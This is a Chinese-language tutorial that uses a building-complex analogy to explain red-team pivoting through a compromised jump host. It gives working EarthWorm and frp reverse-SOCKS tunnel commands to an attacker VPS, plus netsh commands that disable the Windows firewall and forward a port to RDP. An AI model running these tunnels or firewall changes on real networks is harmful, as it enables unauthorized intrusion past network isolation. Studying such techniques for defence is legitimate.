内网渗透使其在干什么
这份文档其实是一份“内网渗透意义是什么”,核心讲的是:红队拿到目标内网的一个 “跳板机” 后,如何通过工具搭建 “网络隧道”,突破内网限制,进而访问内网深处的其他机器(比如远程登录目标服务器)。下面用 “生活化比喻 + 步骤拆解” 的方式,把复杂概念和操作讲明白,全程避开晦涩术语。
先搞懂 2 个核心前提:红队的 “处境” 和 “目标”
可以把目标内网想象成一个“大公司园区”:
红队:想进园区深处偷重要文件的人,但一开始只混进了 “园区门口的保安室”(这个保安室就是文档里的 “跳板机”,IP 是 10.10.10.8/10.0.0.153,有 2 个网卡 = 保安室有 2 个门,一个朝园区外,一个朝园区内)。
目标:红队想进园区深处的 “财务室”(文档里的 10.10.10.12 服务器,存着重要数据,只能内网访问)。
问题:保安室到财务室没有 “直接通道”(内网隔离),红队没法直接进去,所以需要搭一个 “秘密通道”—— 这就是文档里说的 “内网隧道 / 穿透”。
再拆 3 个关键概念:不用记名词,记 “作用”
文档里反复提 “转发 / 映射 / 代理 / 穿透”,其实不用区分太细,核心就 3 个目的:
| 概念(文档里的词) | 生活化比喻 | 作用(红队要用它干嘛) |
|---|---|---|
| 端口转发 / 映射 | 给房间 “装个中转门铃” | 比如财务室(10.10.10.12)只接内部电话,红队让保安室(跳板机)装个 “中转器”:打保安室的 10086 号,会自动转到财务室的 3389 号(远程登录端口)。 |
| 代理 | 找个 “内部跑腿的人” | 红队没法直接进园区,让保安室的人(代理)帮自己传话、拿东西 —— 红队的所有请求都通过保安室转发到内网,内网的响应也通过保安室传回来。 |
| 内网穿透 | 搭 “秘密通道” | 最终目的:不管用转发还是代理,只要能让红队从 “门口保安室” 触达 “园区深处”,就是 “穿透” 了。 |
核心操作:红队如何搭 “秘密通道”?(2 个常用工具演示)
文档重点讲了 2 个工具(EarthWorm/frp),操作逻辑几乎一样:先在红队自己的服务器(VPS)上 “搭接收点”,再在跳板机上 “搭发送点”,最后红队通过 “接收点” 进内网。下面用 “园区比喻” 拆解最常用的 “反向穿透”(适合跳板机能连外网的情况):
工具 1:EarthWorm(简称 EW,像 “拉一根秘密电线”)
红队的 VPS(相当于红队在园区外的 “临时据点”,IP 是 10.0.0.158)和跳板机(保安室)配合,搭一条 “电线” 连到财务室:
红队先在自己的 VPS 上 “装接收器”
执行命令:
./ew_for_linux64 -s rcsocks -l 1008 -e 888→ 比喻:在 VPS 上装一个 “信号接收器”,分 2 个口:
888 口:用来接跳板机的 “信号”(相当于跳板机把线拉到 VPS 的 888 口);
1008 口:把跳板机传来的信号 “转接到红队的电脑上”(红队用电脑接这个口就能进内网)。
跳板机(保安室)“拉电线连到 VPS”
执行命令:
ew_for_Win.exe -s rssocks -d ``10.0.0.158`` -e 888→ 比喻:保安室拉一根电线,一头插自己的 “内网接口”(能通财务室),另一头连到 VPS 的 888 口,显示 “连接成功”= 电线通了。
红队用 “自己的电脑” 进内网
用一个叫 “Proxifier” 的工具,连 VPS 的 1008 口(相当于红队的电脑插在 VPS 的 1008 口上),然后打开 “远程登录工具”(mstsc),输入财务室地址(10.10.10.12)—— 就能直接进财务室了!
工具 2:frp(更灵活的 “秘密通道”,支持更多设备)
和 EW 逻辑类似,但需要 “写配置文件”(相当于给通道定规则):
红队 VPS(园区外据点)“搭接收站”
写一个叫
frps.ini的配置文件,核心内容:bind_port = 7000→ 比喻:VPS 的接收站只开一个 “7000 口”,专门等跳板机来连。
然后启动接收站:
./frps -c frps.ini(相当于打开接收站电源)。跳板机(保安室)“按规则连接收站”
写一个叫
frpc.ini的配置文件,核心内容:
连 VPS 的 7000 口(
server_addr = ``10.0.0.158``, server_port = 7000);开一个 “7777 口” 专门传 “远程登录信号”(
remote_port = 7777, plugin = socks5)。然后启动跳板机的 “发送端”:
frpc.exe -c frpc.ini—— 显示 “成功”= 通道通了。
红队进内网
还是用 “Proxifier” 连 VPS 的 7777 口,再用 “远程登录工具” 输 10.10.10.12—— 照样能进财务室。
其他补充:简单的 “端口转发”(不用复杂工具,适合临时用)
如果红队只想 “临时登一下跳板机”,还能用 Windows 自带的 “netsh” 工具(相当于 “临时改一下保安室的门铃设置”):
先关跳板机的防火墙(不然门铃响不了):
netsh advfirewall set allprofiles state off;给跳板机装 “中转门铃”:把 “10086 号门铃” 转接到 “3389 号(远程登录口)”,命令:
netsh interface portproxy add v4tov4 listenport=10086 connectaddress=``127.0.0.1`` connectport=3389;红队直接用 “远程登录工具” 连跳板机的 10086 口 —— 相当于直接登跳板机了。
最后总结:这份文档到底讲了啥?
一句话:红队拿到内网 “跳板机” 后,用 EW/frp 等工具,在自己的 VPS 和跳板机之间搭 “秘密通道”,然后通过这个通道访问内网深处的机器,完成渗透。
所有操作的核心都是 “绕开内网隔离”—— 就像从园区门口的保安室,搭一条只有自己能走的路,直通里面的财务室。
